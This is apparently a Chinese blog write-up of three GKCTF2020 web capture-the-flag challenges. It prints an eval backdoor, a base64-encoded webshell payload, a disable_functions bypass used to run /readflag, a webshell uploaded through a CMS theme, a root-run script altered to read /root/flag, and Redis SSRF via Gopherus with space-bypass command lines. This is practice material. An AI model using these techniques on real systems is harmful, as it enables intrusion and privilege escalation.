buu-web刷题

GKCTF2020复现

备赛刷题

CheckIN

首先源码

<title>Check_In</title>
<?php 
highlight_file(__FILE__);
class ClassName
{
        public $code = null;
        public $decode = null;
        function __construct()
        {
                $this->code = @$this->x()['Ginkgo'];
                $this->decode = @base64_decode( $this->code );
                @Eval($this->decode);
        }

        public function x()
        {
                return $_REQUEST;
        }
}
new ClassName();

乍一看没有反序列unsearialize函数 但是这里直接就可以命令执行了phpinfo()一下

直接可以命令执行

在这里插入图片描述

尝试直接命令执行无果. 经发现是禁了许多函数

在这里插入图片描述

第一时间想到的就是可以利用蚁剑连马

传入eval($_POST['rgylin']);  并且进行base编码 =>ZXZhbCgkX1BPU1RbJ3JneWxpbiddKTs=
post 传 rgylin =phpinfo();
可以命令执行
连接
但是flag 打开是一片空白

但发现执行不了

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LqyNEiql-1636167944696)(C:\Users\ASUS\Desktop\web刷题\图片\QQ截图20211106000523.png)]

利用 bypass 文件上传并包含 (这里是用php7-gc-bypass)在tmp目录中上传 改成pwn("/readflag"); 执行

再去包含此文件即可

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QK99pEin-1636167944697)(C:\Users\ASUS\Desktop\web刷题\图片\QQ截图20211106001024.png)]

include('/tmp/exploit.php');=>base64=>aW5jbHVkZSgnL3RtcC9leHBsb2l0LnBocCcpOw==

拿到flag

签到都这末费劲0.0

老八小超市儿

打开容器是一套商场CMS

发现有后台
在这里插入图片描述

登入成功

发现有上传主题点,去官网随便下载一个主题并将马写上上传

发现成功执行
在这里插入图片描述

a=system(‘cat /flag’);时候得到了一个假flag

蚁剑链接

发现有flag.hint

Sat Nov  6 01:20:14 2021
Get The RooT,The Date Is Useful!

查看一下权限发现auto.sh有root权限

其内容是

#!/bin/sh
while true; do (python /var/mail/makeflaghint.py &) && sleep 60; done

那末我们可以通过这个脚本来读取flag

将gk改为

gk=open("/root/flag",'r').read();

便可拿到flag

EZ三剑客-EzWeb

首先打开网页来看 就是一个ssrf

发现file被过滤了 无法读取文件

查看源码发现

<!--?secret-->

传1 得到ip地址

那就扫一下该网段存活的主机,发现6 存在 那再扫一下端口

在这里插入图片描述

发现6379开放,是ssrf 无疑了

然后就没思路了 之前没怎么做过这方面题参考大佬wp

利用gopherus GitHub一搜就有

生成payload

在这里插入图片描述

直接打过去 然后访问 得到flag 但这里必须得绕过空格才行 原理不知道为啥

有$IFS < 等等

10.0.102.6//shell.php?rgylin=system('cat$IFS$9/flag');
10.0.102.6//shell.php?rgylin=system('cat</flag');

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AvO4hG4M-1636167944702)(C:\Users\ASUS\Desktop\web刷题\图片\QQ截图20211106110345.png)]

拿到flag

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值